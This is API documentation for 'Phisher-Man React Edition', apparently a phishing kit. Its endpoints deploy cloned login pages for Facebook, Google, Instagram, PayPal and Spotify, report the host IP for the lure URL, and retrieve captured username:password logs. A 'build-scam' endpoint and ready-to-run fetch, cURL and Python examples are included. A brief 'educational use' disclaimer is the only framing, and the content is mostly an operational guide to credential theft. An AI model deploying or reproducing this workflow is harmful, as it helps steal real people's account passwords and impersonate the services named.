API Documentation
DISCLAIMER
IMPORTANT: This tool is for educational purposes and authorized testing only.
Use only on systems you own or have explicit permission to test.
Overview
The Phisher-Man React Edition provides a RESTful API for managing phishing templates, controlling the Apache server, and monitoring captured data.
Base URL: http://localhost:5000
Authentication
Currently, no authentication is required. For production use, implement proper authentication mechanisms.
Endpoints
1. Dashboard Data
GET /api/dashboard
Retrieves available phishing templates and their metadata.
Request:
GET /api/dashboard
Response:
{
"templates": [
{
"id": "facebook",
"name": "Facebook",
"logo": "/static/logos/facebook.jpg",
"description": "Facebook Login Page"
},
{
"id": "google",
"name": "Google",
"logo": "/static/logos/google.jpg",
"description": "Google Login Page"
},
{
"id": "instagram",
"name": "Instagram",
"logo": "/static/instagram.png",
"description": "Instagram Login Page"
},
{
"id": "paypal",
"name": "PayPal",
"logo": "/static/logos/paypal.jpeg",
"description": "PayPal Login Page"
},
{
"id": "spotify",
"name": "Spotify",
"logo": "/static/logos/spotify.jpg",
"description": "Spotify Login Page"
},
{
"id": "facebook-security",
"name": "Facebook Security",
"logo": "/static/logos/facebook.jpg",
"description": "Facebook Security Page"
}
]
}
Status Codes:
200 OK
- Success500 Internal Server Error
- Server error
2. Server Status
GET /api/server/status
Checks the current status of the Apache2 server.
Request:
GET /api/server/status
Response:
{
"status": "running",
"message": "Apache2 is running"
}
Possible Status Values:
"running"
- Apache2 is active"stopped"
- Apache2 is not running"error"
- Error checking status
3. Server Control
POST /api/server/:action
Controls the Apache2 server (start, stop, clear).
Request:
POST /api/server/start
POST /api/server/stop
POST /api/server/clear
Parameters:
action
(path parameter) - Action to perform:start
- Start Apache2 servicestop
- Stop Apache2 serviceclear
- Clear Apache document root
Response:
{
"success": true,
"message": "Apache2 started successfully"
}
Error Response:
{
"success": false,
"message": "Failed to start Apache2: Permission denied"
}
4. IP Information
GET /api/server/ip
Retrieves local and public IP addresses.
Request:
GET /api/server/ip
Response:
{
"localIP": "127.0.0.1",
"publicIP": "192.168.1.100"
}
IP Address Logic:
localIP
: Always returns127.0.0.1
publicIP
: Automatically detected from network interfaces- Priority:
192.168.x.x
addresses first - Fallback: Any non-internal IPv4 address
- Final fallback:
127.0.0.1
- Priority:
5. Deploy Template
POST /api/build-scam
Deploys a phishing template to the Apache server.
Request:
POST /api/build-scam
Content-Type: application/json
{
"template": "facebook"
}
Request Body:
{
"template": "string" // Template ID (facebook, google, instagram, paypal, spotify, facebook-security)
}
Response:
{
"success": true,
"message": "Template facebook deployed successfully",
"localIP": "127.0.0.1",
"publicIP": "192.168.1.100",
"localURL": "http://127.0.0.1/facebook/login.html",
"publicURL": "http://192.168.1.100/facebook/login.html",
"template": "facebook"
}
Deployment Process:
- Stop Apache2 service
- Clear
/var/www/html/
directory - Create template-specific directory
- Copy template files
- Copy static assets (logos)
- Create index.html redirect
- Set proper permissions
- Start Apache2 service
6. Get Logs
GET /api/logs
Retrieves captured credentials from all deployed templates.
Request:
GET /api/logs
Response:
{
"logs": "=== FACEBOOK LOGS ===\nusername1:password1\nusername2:password2\n\n=== GOOGLE LOGS ===\nuser3:pass3\n\n"
}
Log Format:
- Each template section is labeled with
=== TEMPLATE_NAME LOGS ===
- Credentials are in format:
username:password
- Multiple templates are separated by double newlines
Log File Locations:
/var/www/html/facebook/usernames.txt
/var/www/html/google/usernames.txt
/var/www/html/instagram/usernames.txt
/var/www/html/paypal/usernames.txt
/var/www/html/spotify/usernames.txt
/var/www/html/facebook-security/usernames.txt
Error Handling
Standard Error Response
{
"error": "Error message description"
}
Common Error Codes
400 Bad Request
- Invalid request parameters404 Not Found
- Resource not found500 Internal Server Error
- Server-side error
Example Usage
JavaScript/Fetch
// Get dashboard data
const response = await fetch('/api/dashboard');
const data = await response.json();
// Deploy template
const deployResponse = await fetch('/api/build-scam', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({ template: 'facebook' })
});
// Get logs
const logsResponse = await fetch('/api/logs');
const logs = await logsResponse.json();
cURL
# Get dashboard
curl http://localhost:5000/api/dashboard
# Deploy template
curl -X POST http://localhost:5000/api/build-scam \
-H "Content-Type: application/json" \
-d '{"template":"facebook"}'
# Get logs
curl http://localhost:5000/api/logs
# Start Apache
curl -X POST http://localhost:5000/api/server/start
Python
import requests
# Get dashboard
response = requests.get('http://localhost:5000/api/dashboard')
templates = response.json()
# Deploy template
deploy_response = requests.post(
'http://localhost:5000/api/build-scam',
json={'template': 'facebook'}
)
# Get logs
logs_response = requests.get('http://localhost:5000/api/logs')
logs = logs_response.json()
Security Considerations
Current Security Status
- ❌ No authentication required
- ❌ No rate limiting
- ❌ CORS allows all origins
- ❌ No input validation
- ❌ No HTTPS enforcement
Recommended Security Improvements
- Authentication: Implement JWT or session-based auth
- Rate Limiting: Use express-rate-limit
- Input Validation: Use joi or express-validator
- HTTPS: Force HTTPS in production
- CORS: Restrict to specific domains
- Logging: Implement security event logging
For API support, visit our Discord: https://discord.gg/KcuMUUAP5T